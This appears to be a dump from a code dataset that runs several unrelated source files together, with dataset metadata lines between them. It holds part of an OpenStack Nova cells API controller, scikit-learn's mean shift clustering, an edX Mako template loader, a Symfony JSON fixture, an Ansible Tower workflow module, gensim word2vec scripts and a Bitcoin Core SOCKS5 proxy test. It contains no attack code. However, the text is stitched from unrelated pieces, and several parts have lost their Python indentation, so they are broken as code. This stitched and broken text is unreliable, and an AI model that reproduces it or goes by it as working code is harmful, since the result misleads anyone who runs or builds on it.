                setattr(transport_host, key, cell.pop(input_field))
        # Now set the transport URL
        cell['transport_url'] = str(transport_url)
    # NOTE(gmann): Returns 200 for backwards compatibility but should be 201
    # as this operation complete the creation of aggregates resource when
    # returning a response.
    @extensions.expected_errors((400, 403, 501))
    @common.check_cells_enabled
    @validation.schema(cells.create)
    def create(self, req, body):
        """Create a child cell entry."""
        context = req.environ['nova.context']
        authorize(context)
        authorize(context, action="create")
        cell = body['cell']
        self._normalize_cell(cell)
        try:
            cell = self.cells_rpcapi.cell_create(context, cell)
        except exception.CellsUpdateUnsupported as e:
            raise exc.HTTPForbidden(explanation=e.format_message())
        return dict(cell=_scrub_cell(cell))
    @extensions.expected_errors((400, 403, 404, 501))
    @common.check_cells_enabled
    @validation.schema(cells.update)
    def update(self, req, id, body):
        """Update a child cell entry. 'id' is the cell name to update."""
        context = req.environ['nova.context']
        authorize(context)
        authorize(context, action="update")
        cell = body['cell']
        cell.pop('id', None)
        try:
            # NOTE(Vek): There is a race condition here if multiple
            # callers are trying to update the cell
            # information simultaneously. Since this
            # operation is administrative in nature, and
            # will be going away in the future, I don't see
            # it as much of a problem...
            existing = self.cells_rpcapi.cell_get(context, id)
        except exception.CellNotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())
        self._normalize_cell(cell, existing)
        try:
            cell = self.cells_rpcapi.cell_update(context, id, cell)
        except exception.CellNotFound as e:
            raise exc.HTTPNotFound(explanation=e.format_message())
        except exception.CellsUpdateUnsupported as e:
            raise exc.HTTPForbidden(explanation=e.format_message())
        return dict(cell=_scrub_cell(cell))
    # NOTE(gmann): Returns 200 for backwards compatibility but should be 204
    # as this operation complete the sync instance info and return
    # no response body.
    @extensions.expected_errors((400, 501))
    @common.check_cells_enabled
    @validation.schema(cells.sync_instances)
    def sync_instances(self, req, body):
        """Tell all cells to sync instance info."""
        context = req.environ['nova.context']
        authorize(context)
        authorize(context, action="sync_instances")
        project_id = body.pop('project_id', None)
        deleted = body.pop('deleted', False)
        updated_since = body.pop('updated_since', None)
        # 'deleted' may arrive as a string ("true"/"false"); normalize.
        if isinstance(deleted, six.string_types):
            deleted = strutils.bool_from_string(deleted, strict=True)
        self.cells_rpcapi.sync_instances(context, project_id=project_id,
                updated_since=updated_since, deleted=deleted)
class Cells(extensions.V3APIExtensionBase):
    """Enables cells-related functionality such as adding neighbor cells,
    listing neighbor cells, and getting the capabilities of the local cell.
    """
    name = "Cells"
    alias = ALIAS
    version = 1
    def get_resources(self):
        # Extra URLs exposed on the cells collection and its members.
        collection = {
            'detail': 'GET',
            'info': 'GET',
            'sync_instances': 'POST',
            'capacities': 'GET',
        }
        member = {
            'capacities': 'GET',
        }
        resource = extensions.ResourceExtension(
            ALIAS, CellsController(),
            collection_actions=collection,
            member_actions=member)
        return [resource]
    def get_controller_extensions(self):
        # This extension supplies its own controller; nothing to extend.
        return []
"""Mean shift clustering algorithm.
Mean shift clustering aims to discover *blobs* in a smooth density of
samples. It is a centroid based algorithm, which works by updating candidates
for centroids to be the mean of the points within a given region. These
candidates are then filtered in a post-processing stage to eliminate
near-duplicates to form the final set of centroids.
Seeding is performed using a binning technique for scalability.
"""
# Authors: Conrad Lee <conradlee@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Martino Sorbaro <martino.sorbaro@ed.ac.uk>
import numpy as np
import warnings
from collections import defaultdict
from ..externals import six
from ..utils.validation import check_is_fitted
from ..utils import extmath, check_random_state, gen_batches, check_array
from ..base import BaseEstimator, ClusterMixin
from ..neighbors import NearestNeighbors
from ..metrics.pairwise import pairwise_distances_argmin
from ..externals.joblib import Parallel
from ..externals.joblib import delayed
def estimate_bandwidth(X, quantile=0.3, n_samples=None, random_state=0):
    """Estimate the bandwidth to use with the mean-shift algorithm.

    Note that this function takes time at least quadratic in n_samples.
    For large datasets, it's wise to set the n_samples parameter to a
    small value.

    Parameters
    ----------
    X : array-like, shape=[n_samples, n_features]
        Input points.
    quantile : float, default 0.3
        should be between [0, 1]
        0.5 means that the median of all pairwise distances is used.
    n_samples : int, optional
        The number of samples to use. If not given, all samples are used.
    random_state : int or RandomState
        Pseudo-random number generator state used for random sampling.

    Returns
    -------
    bandwidth : float
        The bandwidth parameter.
    """
    random_state = check_random_state(random_state)
    if n_samples is not None:
        idx = random_state.permutation(X.shape[0])[:n_samples]
        X = X[idx]
    # Guard against a zero neighbor count when quantile * n_samples < 1,
    # which would make NearestNeighbors raise a ValueError.
    n_neighbors = max(1, int(X.shape[0] * quantile))
    nbrs = NearestNeighbors(n_neighbors=n_neighbors)
    nbrs.fit(X)
    bandwidth = 0.
    # Average, over all points, the distance to the farthest of the
    # n_neighbors nearest neighbors; batched to bound memory use.
    for batch in gen_batches(len(X), 500):
        d, _ = nbrs.kneighbors(X[batch, :], return_distance=True)
        bandwidth += np.max(d, axis=1).sum()
    return bandwidth / X.shape[0]
# separate function for each seed's iterative loop
def _mean_shift_single_seed(my_mean, X, nbrs, max_iter):
    # For each seed, climb gradient until convergence or max_iter.
    # Returns (mean_tuple, n_points_within) on convergence; returns
    # None (implicitly) when the seed has no points within bandwidth.
    bandwidth = nbrs.get_params()['radius']
    stop_thresh = 1e-3 * bandwidth # when mean has converged
    completed_iterations = 0
    while True:
        # Find mean of points within bandwidth
        i_nbrs = nbrs.radius_neighbors([my_mean], bandwidth,
                                       return_distance=False)[0]
        points_within = X[i_nbrs]
        if len(points_within) == 0:
            break # Depending on seeding strategy this condition may occur
        my_old_mean = my_mean # save the old mean
        my_mean = np.mean(points_within, axis=0)
        # If converged or at max_iter, adds the cluster
        if (extmath.norm(my_mean - my_old_mean) < stop_thresh or
            completed_iterations == max_iter):
            return tuple(my_mean), len(points_within)
        completed_iterations += 1
def mean_shift(X, bandwidth=None, seeds=None, bin_seeding=False,
               min_bin_freq=1, cluster_all=True, max_iter=300,
               max_iterations=None, n_jobs=1):
    """Perform mean shift clustering of data using a flat kernel.
    Read more in the :ref:`User Guide <mean_shift>`.
    Parameters
    ----------
    X : array-like, shape=[n_samples, n_features]
        Input data.
    bandwidth : float, optional
        Kernel bandwidth.
        If bandwidth is not given, it is determined using a heuristic based on
        the median of all pairwise distances. This will take quadratic time in
        the number of samples. The sklearn.cluster.estimate_bandwidth function
        can be used to do this more efficiently.
    seeds : array-like, shape=[n_seeds, n_features] or None
        Point used as initial kernel locations. If None and bin_seeding=False,
        each data point is used as a seed. If None and bin_seeding=True,
        see bin_seeding.
    bin_seeding : boolean, default=False
        If true, initial kernel locations are not locations of all
        points, but rather the location of the discretized version of
        points, where points are binned onto a grid whose coarseness
        corresponds to the bandwidth. Setting this option to True will speed
        up the algorithm because fewer seeds will be initialized.
        Ignored if seeds argument is not None.
    min_bin_freq : int, default=1
        To speed up the algorithm, accept only those bins with at least
        min_bin_freq points as seeds.
    cluster_all : boolean, default True
        If true, then all points are clustered, even those orphans that are
        not within any kernel. Orphans are assigned to the nearest kernel.
        If false, then orphans are given cluster label -1.
    max_iter : int, default 300
        Maximum number of iterations, per seed point before the clustering
        operation terminates (for that seed point), if has not converged yet.
    n_jobs : int
        The number of jobs to use for the computation. This works by computing
        each of the n_init runs in parallel.
        If -1 all CPUs are used. If 1 is given, no parallel computing code is
        used at all, which is useful for debugging. For n_jobs below -1,
        (n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
        are used.
    Returns
    -------
    cluster_centers : array, shape=[n_clusters, n_features]
        Coordinates of cluster centers.
    labels : array, shape=[n_samples]
        Cluster labels for each point.
    Notes
    -----
    See examples/cluster/plot_meanshift.py for an example.
    """
    # FIXME To be removed in 0.18
    if max_iterations is not None:
        warnings.warn("The `max_iterations` parameter has been renamed to "
                      "`max_iter` from version 0.16. The `max_iterations` "
                      "parameter will be removed in 0.18", DeprecationWarning)
        max_iter = max_iterations
    if bandwidth is None:
        bandwidth = estimate_bandwidth(X)
    elif bandwidth <= 0:
        raise ValueError("bandwidth needs to be greater than zero or None,\
            got %f" % bandwidth)
    if seeds is None:
        if bin_seeding:
            seeds = get_bin_seeds(X, bandwidth, min_bin_freq)
        else:
            seeds = X
    n_samples, n_features = X.shape
    center_intensity_dict = {}
    nbrs = NearestNeighbors(radius=bandwidth).fit(X)
    # execute iterations on all seeds in parallel
    all_res = Parallel(n_jobs=n_jobs)(
        delayed(_mean_shift_single_seed)
        (seed, X, nbrs, max_iter) for seed in seeds)
    # copy results in a dictionary
    # (seeds that converged to nowhere return None and are skipped)
    for i in range(len(seeds)):
        if all_res[i] is not None:
            center_intensity_dict[all_res[i][0]] = all_res[i][1]
    if not center_intensity_dict:
        # nothing near seeds
        raise ValueError("No point was within bandwidth=%f of any seed."
                         " Try a different seeding strategy \
or increase the bandwidth."
                         % bandwidth)
    # POST PROCESSING: remove near duplicate points
    # If the distance between two kernels is less than the bandwidth,
    # then we have to remove one because it is a duplicate. Remove the
    # one with fewer points.
    sorted_by_intensity = sorted(center_intensity_dict.items(),
                                 key=lambda tup: tup[1], reverse=True)
    sorted_centers = np.array([tup[0] for tup in sorted_by_intensity])
    unique = np.ones(len(sorted_centers), dtype=np.bool)
    nbrs = NearestNeighbors(radius=bandwidth).fit(sorted_centers)
    # Walk centers from most to least populated; each kept center
    # suppresses all other centers within one bandwidth of it.
    for i, center in enumerate(sorted_centers):
        if unique[i]:
            neighbor_idxs = nbrs.radius_neighbors([center],
                                                  return_distance=False)[0]
            unique[neighbor_idxs] = 0
            unique[i] = 1  # leave the current point as unique
    cluster_centers = sorted_centers[unique]
    # ASSIGN LABELS: a point belongs to the cluster that it is closest to
    nbrs = NearestNeighbors(n_neighbors=1).fit(cluster_centers)
    labels = np.zeros(n_samples, dtype=np.int)
    distances, idxs = nbrs.kneighbors(X)
    if cluster_all:
        labels = idxs.flatten()
    else:
        # Orphans (farther than one bandwidth from any center) get -1.
        labels.fill(-1)
        bool_selector = distances.flatten() <= bandwidth
        labels[bool_selector] = idxs.flatten()[bool_selector]
    return cluster_centers, labels
def get_bin_seeds(X, bin_size, min_bin_freq=1):
    """Finds seeds for mean_shift.

    Points are snapped onto a grid with spacing ``bin_size``, and every
    grid cell holding at least ``min_bin_freq`` points becomes a seed.

    Parameters
    ----------
    X : array-like, shape=[n_samples, n_features]
        Input points, the same points that will be used in mean_shift.
    bin_size : float
        Controls the coarseness of the binning. Smaller values lead
        to more seeding (which is computationally more expensive). If you're
        not sure how to set this, set it to the value of the bandwidth used
        in clustering.mean_shift.
    min_bin_freq : integer, optional
        Only bins with at least min_bin_freq will be selected as seeds.
        Raising this value decreases the number of seeds found, which
        makes mean_shift computationally cheaper.

    Returns
    -------
    bin_seeds : array-like, shape=[n_samples, n_features]
        Points used as initial kernel positions in clustering.mean_shift.
    """
    # Count how many points fall into each grid cell.
    freq_per_bin = defaultdict(int)
    for point in X:
        freq_per_bin[tuple(np.round(point / bin_size))] += 1
    # Keep only the sufficiently populated cells.
    seeds = np.array([cell for cell, freq in freq_per_bin.items()
                      if freq >= min_bin_freq], dtype=np.float32)
    if len(seeds) == len(X):
        # Binning did not reduce the point count at all.
        warnings.warn("Binning data failed with provided bin_size=%f,"
                      " using data points as seeds." % bin_size)
        return X
    # Scale grid coordinates back into data space.
    return seeds * bin_size
class MeanShift(BaseEstimator, ClusterMixin):
    """Mean shift clustering using a flat kernel.
    Mean shift clustering aims to discover "blobs" in a smooth density of
    samples. It is a centroid-based algorithm, which works by updating
    candidates for centroids to be the mean of the points within a given
    region. These candidates are then filtered in a post-processing stage to
    eliminate near-duplicates to form the final set of centroids.
    Seeding is performed using a binning technique for scalability.
    Read more in the :ref:`User Guide <mean_shift>`.
    Parameters
    ----------
    bandwidth : float, optional
        Bandwidth used in the RBF kernel.
        If not given, the bandwidth is estimated using
        sklearn.cluster.estimate_bandwidth; see the documentation for that
        function for hints on scalability (see also the Notes, below).
    seeds : array, shape=[n_samples, n_features], optional
        Seeds used to initialize kernels. If not set,
        the seeds are calculated by clustering.get_bin_seeds
        with bandwidth as the grid size and default values for
        other parameters.
    bin_seeding : boolean, optional
        If true, initial kernel locations are not locations of all
        points, but rather the location of the discretized version of
        points, where points are binned onto a grid whose coarseness
        corresponds to the bandwidth. Setting this option to True will speed
        up the algorithm because fewer seeds will be initialized.
        default value: False
        Ignored if seeds argument is not None.
    min_bin_freq : int, optional
        To speed up the algorithm, accept only those bins with at least
        min_bin_freq points as seeds. If not defined, set to 1.
    cluster_all : boolean, default True
        If true, then all points are clustered, even those orphans that are
        not within any kernel. Orphans are assigned to the nearest kernel.
        If false, then orphans are given cluster label -1.
    n_jobs : int
        The number of jobs to use for the computation. This works by computing
        each of the n_init runs in parallel.
        If -1 all CPUs are used. If 1 is given, no parallel computing code is
        used at all, which is useful for debugging. For n_jobs below -1,
        (n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
        are used.
    Attributes
    ----------
    cluster_centers_ : array, [n_clusters, n_features]
        Coordinates of cluster centers.
    labels_ :
        Labels of each point.
    Notes
    -----
    Scalability:
    Because this implementation uses a flat kernel and
    a Ball Tree to look up members of each kernel, the complexity will is
    to O(T*n*log(n)) in lower dimensions, with n the number of samples
    and T the number of points. In higher dimensions the complexity will
    tend towards O(T*n^2).
    Scalability can be boosted by using fewer seeds, for example by using
    a higher value of min_bin_freq in the get_bin_seeds function.
    Note that the estimate_bandwidth function is much less scalable than the
    mean shift algorithm and will be the bottleneck if it is used.
    References
    ----------
    Dorin Comaniciu and Peter Meer, "Mean Shift: A robust approach toward
    feature space analysis". IEEE Transactions on Pattern Analysis and
    Machine Intelligence. 2002. pp. 603-619.
    """
    def __init__(self, bandwidth=None, seeds=None, bin_seeding=False,
                 min_bin_freq=1, cluster_all=True, n_jobs=1):
        # Only store the constructor parameters here (sklearn
        # convention); all work happens in fit().
        self.bandwidth = bandwidth
        self.seeds = seeds
        self.bin_seeding = bin_seeding
        self.cluster_all = cluster_all
        self.min_bin_freq = min_bin_freq
        self.n_jobs = n_jobs
    def fit(self, X, y=None):
        """Perform clustering.
        Parameters
        -----------
        X : array-like, shape=[n_samples, n_features]
            Samples to cluster.
        """
        X = check_array(X)
        # Delegate to the functional API; keep its two outputs as the
        # fitted attributes.
        self.cluster_centers_, self.labels_ = \
            mean_shift(X, bandwidth=self.bandwidth, seeds=self.seeds,
                       min_bin_freq=self.min_bin_freq,
                       bin_seeding=self.bin_seeding,
                       cluster_all=self.cluster_all, n_jobs=self.n_jobs)
        return self
    def predict(self, X):
        """Predict the closest cluster each sample in X belongs to.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape=[n_samples, n_features]
            New data to predict.
        Returns
        -------
        labels : array, shape [n_samples,]
            Index of the cluster each sample belongs to.
        """
        check_is_fitted(self, "cluster_centers_")
        # Label = index of the nearest fitted cluster center.
        return pairwise_distances_argmin(X, self.cluster_centers_)
import logging
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.template.base import TemplateDoesNotExist
from django.template.loaders.filesystem import Loader as FilesystemLoader
from django.template.loaders.app_directories import Loader as AppDirectoriesLoader
from django.template import Engine
from edxmako.template import Template
from openedx.core.lib.tempdir import mkdtemp_clean
# Module-level logger for the mako template-loader machinery.
log = logging.getLogger(__name__)
class MakoLoader(object):
    """
    This is a Django loader object which will load the template as a
    Mako template if the first line is "## mako". It is based off BaseLoader
    in django.template.loader.
    """
    is_usable = False
    def __init__(self, base_loader):
        # base_loader is an instance of a BaseLoader subclass
        self.base_loader = base_loader
        module_directory = getattr(settings, 'MAKO_MODULE_DIR', None)
        if module_directory is None:
            log.warning("For more caching of mako templates, set the MAKO_MODULE_DIR in settings!")
            # Fall back to a throw-away temp dir for compiled templates.
            module_directory = mkdtemp_clean()
        self.module_directory = module_directory
    def __call__(self, template_name, template_dirs=None):
        # Let the loader instance itself be used as a callable, as
        # Django expects of template loaders.
        return self.load_template(template_name, template_dirs)
    def load_template(self, template_name, template_dirs=None):
        # Load the raw source, then pick Mako vs. Django templating
        # based on the "## mako" marker in the first line.
        source, file_path = self.load_template_source(template_name, template_dirs)
        if source.startswith("## mako\n"):
            # This is a mako template
            template = Template(filename=file_path,
                                module_directory=self.module_directory,
                                input_encoding='utf-8',
                                output_encoding='utf-8',
                                uri=template_name)
            return template, None
        else:
            # This is a regular template
            try:
                template = Engine.get_default().from_string(source)
                return template, None
            except ImproperlyConfigured:
                # Either no DjangoTemplates engine was configured -or- multiple engines
                # were configured, making the get_default() call above fail.
                raise
            except TemplateDoesNotExist:
                # If compiling the loaded template raises TemplateDoesNotExist, back off to
                # returning the source and display name for the requested template.
                # This allows for eventual correct identification of the actual template that does
                # not exist.
                return source, file_path
    def load_template_source(self, template_name, template_dirs=None):
        # Just having this makes the template load as an instance, instead of a class.
        return self.base_loader.load_template_source(template_name, template_dirs)
    def reset(self):
        # Delegate cache reset to the wrapped base loader.
        self.base_loader.reset()
class MakoFilesystemLoader(MakoLoader):
is_usable = True
_accepts_engine_in_init = True
def __init__(self, *args):
MakoLoader.__init__(self, FilesystemLoader(*args))
class MakoAppDirectoriesLoader(MakoLoader):
is_usable = True
_accepts_engine_in_init = True
def __init__(self, *args):
MakoLoader.__init__(self, AppDirectoriesLoader(*args)) | unknown | codeparrot/codeparrot-clean | ||
{
"event1": [
{
"type": "function",
"name": "var_dump",
"priority": 255
},
{
"type": "closure",
"priority": -1
}
],
"event2": [
{
"type": "object",
"name": "Symfony\\Bundle\\FrameworkBundle\\Tests\\Console\\Descriptor\\CallableClass",
"priority": 0
}
]
} | json | github | https://github.com/symfony/symfony | src/Symfony/Bundle/FrameworkBundle/Tests/Fixtures/Descriptor/event_dispatcher_1_events.json |
#!/usr/bin/python
# coding: utf-8 -*-
#
# (c) 2018, Adrien Fleury <fleu42@gmail.com>
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: tower_workflow_template
author: "Adrien Fleury (@fleu42)"
version_added: "2.7"
short_description: create, update, or destroy Ansible Tower workflow template.
description:
- Create, update, or destroy Ansible Tower workflows. See
U(https://www.ansible.com/tower) for an overview.
options:
allow_simultaneous:
description:
- If enabled, simultaneous runs of this job template will be allowed.
required: False
type: bool
description:
description:
- The description to use for the workflow.
required: False
default: null
extra_vars:
description:
- >
Extra variables used by Ansible in YAML or key=value format.
required: False
name:
description:
- The name to use for the workflow.
required: True
organization:
description:
- The organization the workflow is linked to.
required: False
schema:
description:
- >
The schema is a JSON- or YAML-formatted string defining the
hierarchy structure that connects the nodes. Refer to Tower
documentation for more information.
required: False
survey_enabled:
description:
- Setting that variable will prompt the user for job type on the
workflow launch.
required: False
type: bool
survey:
description:
- The definition of the survey associated to the workflow.
required: False
state:
description:
- Desired state of the resource.
required: False
default: "present"
choices: ["present", "absent"]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- tower_workflow_template:
name: Workflow Template
description: My very first Worflow Template
organization: My optional Organization
schema: "{{ lookup(file, my_workflow.json }}"
- tower_worflow_template:
name: Workflow Template
state: absent
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ansible_tower import (
TowerModule,
tower_auth_config,
tower_check_mode
)
try:
import tower_cli
import tower_cli.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
def main():
argument_spec = dict(
name=dict(required=True),
description=dict(required=False),
extra_vars=dict(required=False),
organization=dict(required=False),
allow_simultaneous=dict(type='bool', required=False),
schema=dict(required=False),
survey=dict(required=False),
survey_enabled=dict(type='bool', required=False),
state=dict(choices=['present', 'absent'], default='present'),
)
module = TowerModule(
argument_spec=argument_spec,
supports_check_mode=False
)
name = module.params.get('name')
state = module.params.get('state')
schema = None
if module.params.get('schema'):
schema = module.params.get('schema')
if schema and state == 'absent':
module.fail_json(
msg='Setting schema when state is absent is not allowed',
changed=False
)
json_output = {'workflow_template': name, 'state': state}
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
wfjt_res = tower_cli.get_resource('workflow')
params = {}
params['name'] = name
if module.params.get('description'):
params['description'] = module.params.get('description')
if module.params.get('organization'):
organization_res = tower_cli.get_resource('organization')
try:
organization = organization_res.get(
name=module.params.get('organization'))
params['organization'] = organization['id']
except exc.NotFound as excinfo:
module.fail_json(
msg='Failed to update organization source,'
'organization not found: {0}'.format(excinfo),
changed=False
)
if module.params.get('survey'):
params['survey_spec'] = module.params.get('survey')
for key in ('allow_simultaneous', 'extra_vars', 'survey_enabled',
'description'):
if module.params.get(key):
params[key] = module.params.get(key)
try:
if state == 'present':
params['create_on_missing'] = True
result = wfjt_res.modify(**params)
json_output['id'] = result['id']
if schema:
wfjt_res.schema(result['id'], schema)
elif state == 'absent':
params['fail_on_missing'] = False
result = wfjt_res.delete(**params)
except (exc.ConnectionError, exc.BadRequest) as excinfo:
module.fail_json(msg='Failed to update workflow template: \
{0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
import gensim
import logging
import sys
# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def book_to_sentences(filename):
with open(filename, 'rb') as infile:
sentences = []
sentence = []
for line in infile.readlines():
clean_line = line.lower().replace('-', '').replace(',', '').replace(';', '').replace(':', '').replace('?', '.').replace('!', '.').replace('_', '').replace('\n', '').replace('\r', '').replace('\xef', '').replace('\xbb', '').replace('\xbf', '')
if '.' in clean_line:
for i in range(0, clean_line.count('.')):
sentence.extend(clean_line[:clean_line.find('.')].split())
sentences.append(sentence)
clean_line = clean_line[clean_line.find('.')+1:]
sentence = clean_line[:clean_line.find('.')].split()
else:
sentence.extend(clean_line.split())
return sentences
def train_and_most_similar(filenames, word):
for filename in filenames:
sentences = book_to_sentences(filename)
model = gensim.models.Word2Vec(sentences)
if word in model:
print('{0} most similar words to {1} are {2}'.format(filename.replace('.txt', ''), word, str(model.most_similar(word))))
else:
print('{0} model does not contain the word {1}'.format(filename.replace('.txt', ''), word))
if __name__ == '__main__':
train_and_most_similar(['ulysses.txt', 'metamorphosis.txt', 'leaves_of_grass.txt', 'alices_adventures_in_wonderland.txt'], 'man') | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import socket
from test_framework.socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
'''
Test plan:
- Start bitcoind's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on bitcoind side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create bitcoinds that connect to them
- Manipulate the bitcoinds using addnode (onetry) an observe effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
'''
class ProxyTest(BitcoinTestFramework):
def __init__(self):
# Create two proxies on different ports
# ... one unauthenticated
self.conf1 = Socks5Configuration()
self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000))
self.conf1.unauth = True
self.conf1.auth = False
# ... one supporting authenticated and unauthenticated (Tor)
self.conf2 = Socks5Configuration()
self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000))
self.conf2.unauth = True
self.conf2.auth = True
# ... one on IPv6 with similar configuration
self.conf3 = Socks5Configuration()
self.conf3.af = socket.AF_INET6
self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000))
self.conf3.unauth = True
self.conf3.auth = True
self.serv1 = Socks5Server(self.conf1)
self.serv1.start()
self.serv2 = Socks5Server(self.conf2)
self.serv2.start()
self.serv3 = Socks5Server(self.conf3)
self.serv3.start()
def setup_nodes(self):
# Note: proxies are not used to connect to local nodes
# this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
return start_nodes(4, self.options.tmpdir, extra_args=[
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0', '-noonion']
])
def node_test(self, node, proxies, auth, test_onion=True):
rv = []
# Test: outgoing IPv4 connection through node
node.addnode("15.61.23.23:1234", "onetry")
cmd = proxies[0].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "15.61.23.23")
assert_equal(cmd.port, 1234)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing IPv6 connection through node
node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
cmd = proxies[1].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534")
assert_equal(cmd.port, 5443)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
if test_onion:
# Test: outgoing onion connection through node
node.addnode("bitcoinostk4e4re.onion:8333", "onetry")
cmd = proxies[2].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "bitcoinostk4e4re.onion")
assert_equal(cmd.port, 8333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing DNS name connection through node
node.addnode("node.noumenon:8333", "onetry")
cmd = proxies[3].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "node.noumenon")
assert_equal(cmd.port, 8333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
return rv
def run_test(self):
# basic -proxy
self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)
# -proxy plus -onion
self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)
# -proxy plus -onion, -proxyrandomize
rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
# Check that credentials as used for -proxyrandomize connections are unique
credentials = set((x.username,x.password) for x in rv)
assert_equal(len(credentials), 4)
# proxy on IPv6 localhost
self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False, False)
def networks_dict(d):
r = {}
for x in d['networks']:
r[x['name']] = x
return r
# test RPC getnetworkinfo
n0 = networks_dict(self.nodes[0].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n0[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n0[net]['proxy_randomize_credentials'], True)
assert_equal(n0['onion']['reachable'], True)
n1 = networks_dict(self.nodes[1].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n1[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n1[net]['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n1['onion']['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['reachable'], True)
n2 = networks_dict(self.nodes[2].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n2[net]['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n2[net]['proxy_randomize_credentials'], True)
assert_equal(n2['onion']['reachable'], True)
n3 = networks_dict(self.nodes[3].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n3[net]['proxy'], '[%s]:%i' % (self.conf3.addr))
assert_equal(n3[net]['proxy_randomize_credentials'], False)
assert_equal(n3['onion']['reachable'], False)
if __name__ == '__main__':
ProxyTest().main() | unknown | codeparrot/codeparrot-clean | ||
import os
import sys
import ast
import gensim
import json
from gensim import utils
import multiprocessing
from gensim.models import Word2Vec
import logging
import argparse
logger = logging.getLogger(__name__)
import redis
data_obj = redis.Redis("localhost", port=6379, db=10) # 2, 9 (smaller), 10 (larger)
class ContextCorpus(object):
def __init__(self, redis_obj, context_prefix='C', example_prefix='C'):
"""
ContextCorpus(contexts)
Parameters
---------
contexts : dict of sets
Each set in the dict should be an observation occurring within
the same context. E.g., every set should contain all pins by
one client or all fixes by one client.
context_prefix : str, optional
This string will be prepended to all context keys
example_prefix : str, optional
This string will be prepended to all non-context words
Examples
------
# If user 1 bought items 0, 1, 2, 3 and user 2
# bought 3, 4, 5 and user bought item 10
contexts = {1:{0,1,2,3}, 2:{3,4,5}, 3:{10}}
cc = ContextCorpus(contexts)
"""
self.redis_obj = redis_obj
self.context_prefix = context_prefix
self.example_prefix = example_prefix
def __iter__(self):
"""Create 'sentences' that start with the context as a word
and then also have items as words on the same line """
count = 0
